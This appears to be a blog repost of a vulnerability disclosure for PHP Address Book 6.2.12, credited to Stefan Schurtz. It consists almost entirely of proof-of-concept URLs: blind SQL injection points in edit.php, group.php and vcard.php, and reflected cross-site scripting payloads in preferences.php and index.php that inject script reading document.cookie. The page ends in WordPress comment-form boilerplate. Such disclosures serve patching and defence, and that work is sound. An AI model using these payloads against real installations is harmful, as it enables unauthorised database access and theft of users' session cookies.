PHP Address Book 6.2.12 Multiple security vulnerabilities

==================
PoC-Exploit
==================
// (Blind) SQL-Injection
http://%5Btarget%5D/addressbook/edit.php?id=%5Bsql-injection%5D
http://%5Btarget%5D/addressbook/group.php?add=Add to&group=1&selected%5b%5d=132&to_group=[sql-injection]
http://%5Btarget%5D/addressbook/vcard.php?id=%5Bsql-injection%5D
// XSS
http://%5Btarget%5D/addressbook/preferences.php?from='”</script><script>alert(document.cookie)</script&gt;
http://%5Btarget%5D/addressbook/index.php?group='”</script><script>alert(document.cookie)</script&gt;

Thank’s to Stefan Schurtz

Iklan

Tinggalkan Balasan

Please log in using one of these methods to post your comment:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s